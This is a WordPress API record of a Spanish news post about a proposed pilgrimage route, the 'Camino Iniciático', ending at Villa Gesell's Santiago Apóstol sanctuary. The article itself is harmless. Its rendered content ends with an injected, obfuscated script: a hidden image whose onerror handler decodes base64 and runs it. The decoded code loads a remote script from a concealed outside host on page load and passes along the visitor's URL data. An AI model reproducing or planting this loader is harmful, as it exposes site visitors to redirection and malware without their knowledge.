{"id":14568,"date":"2023-10-06T23:54:41","date_gmt":"2023-10-07T02:54:41","guid":{"rendered":"https:\/\/nubesmgzdigital.com.ar\/?p=14568"},"modified":"2025-08-13T16:08:03","modified_gmt":"2025-08-13T19:08:03","slug":"villa-gesell-presentacion-del-proyecto-camino-iniciatico-al-camino-de-santiago","status":"publish","type":"post","link":"https:\/\/nubesmgzdigital.com.ar\/index.php\/2023\/10\/06\/villa-gesell-presentacion-del-proyecto-camino-iniciatico-al-camino-de-santiago\/","title":{"rendered":"Villa Gesell: presentaci\u00f3n del Proyecto \u201cCamino Inici\u00e1tico al Camino de Santiago\u201d"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>La ciudad de Villa Gesell posee una joya patrimonial y arquitect\u00f3nica ligada a la fe religiosa: el Santuario Santiago Ap\u00f3stol. Hasta all\u00ed, llegaron hoy, Alejandro Rubin Carballo, Canciller de la Orden de Santiago, y Presidente de ASICOTUR, Asociaci\u00f3n Internacional para la Cooperaci\u00f3n y el Desarrollo Tur\u00edstico, y el Licenciado Jes\u00fas Ares V\u00e1zquez, Consejero de la misma Orden y Vicepresidente de ASICOTUR.<\/em><\/h5>\n\n\n\n<p>El motivo de la presencia, como tambi\u00e9n de las autoridades de Villa Gesell, encabezadas por el Sr. Intendente Gustavo Barrera, el P\u00e1rroco Pablo Bosisio, el Sr Jos\u00e9 Romero, Presidente de la Asociaci\u00f3n Santiago Ap\u00f3stol de Villa Gesell, integrantes de dicha asociaci\u00f3n y miembros la comunidad cat\u00f3lica, fue la presentaci\u00f3n del Proyecto del Camino Inici\u00e1tico al Camino de Santiago.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257270-768x1024.jpg\" alt=\"\" class=\"wp-image-14570\" style=\"width:207px;height:277px\" width=\"207\" height=\"277\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257270-768x1024.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257270-225x300.jpg 225w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257270-1152x1536.jpg 1152w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257270-696x928.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257270-1068x1424.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257270-315x420.jpg 315w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257270.jpg 1200w\" sizes=\"auto, (max-width: 207px) 100vw, 207px\" \/><\/figure>\n<\/div>\n\n\n<p>Dicho proyecto propone iniciar el Camino en la Catedral de Mar del Plata y finalizar en el Santuario Santiago Ap\u00f3stol y abarcar\u00eda 4 partidos en su trayecto: Madariaga, Mar Chiquita, Pinamar y Villa Gesell, 110 km aproximadamente de recorrido y ser\u00edan necesarios 3 albergues a lo largo del mismo. Dicho proyecto tambi\u00e9n plantea la necesidad de realizar un estudio de factibilidad y elaborar un Plan Director. Una comisi\u00f3n se encuentra trabajando en la declaratoria de inter\u00e9s y patrimonio religioso cultural el santuario a distintos niveles.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257218-1024x768.jpg\" alt=\"\" class=\"wp-image-14569\"\/><\/figure>\n\n\n\n<p>Este proyecto fue presentado el 1 de octubre en la Feria Internacional de Turismo, entre otras actividades que realiz\u00f3 la Orden de Santiago y la ASICOTUR , en dicho evento.<\/p>\n\n\n\n<p>El Camino de Santiago de Compostela abarca un conjunto de rutas o caminos de peregrinaci\u00f3n cristiana, de origen en el medioevo, que te llevan a la tumba del Ap\u00f3stol Santiago, situada en la Catedral de Santiago de Compostela, Espa\u00f1a. Hacerlo, significa una experiencia \u00fanica.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"14571\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257271-768x1024.jpg\" alt=\"\" class=\"wp-image-14571\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257271-768x1024.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257271-225x300.jpg 225w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257271-1152x1536.jpg 1152w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257271-696x928.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257271-1068x1424.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257271-315x420.jpg 315w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257271.jpg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"14573\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257269-1024x768.jpg\" alt=\"\" class=\"wp-image-14573\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257269-1024x768.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257269-300x225.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257269-768x576.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257269-1536x1152.jpg 1536w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257269-80x60.jpg 80w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257269-265x198.jpg 265w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257269-696x522.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257269-1068x801.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257269-560x420.jpg 560w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257269.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"14574\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257224-1024x768.jpg\" alt=\"\" class=\"wp-image-14574\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257224-1024x768.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257224-300x225.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257224-768x576.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257224-1536x1152.jpg 1536w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257224-80x60.jpg 80w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257224-265x198.jpg 265w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257224-696x522.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257224-1068x801.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257224-560x420.jpg 560w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/10\/1000257224.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><strong><em>Corresponsal Villa Gesell: Maru Ulivi<\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La ciudad de Villa Gesell posee una joya patrimonial y arquitect\u00f3nica ligada a la fe religiosa: el Santuario Santiago Ap\u00f3stol. Hasta all\u00ed, llegaron hoy, Alejandro Rubin Carballo, Canciller de la Orden de Santiago, y Presidente de ASICOTUR, Asociaci\u00f3n Internacional para la Cooperaci\u00f3n y el Desarrollo Tur\u00edstico, y el Licenciado Jes\u00fas Ares V\u00e1zquez, Consejero de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":14575,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[137,130],"tags":[],"class_list":["post-14568","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-buenos-aires-caba","category-gourmet"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/14568","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/comments?post=14568"}],"version-history":[{"count":3,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/14568\/revisions"}],"predecessor-version":[{"id":19375,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/14568\/revisions\/19375"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media\/14575"}],"wp:attachment":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media?parent=14568"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/categories?post=14568"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/tags?post=14568"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}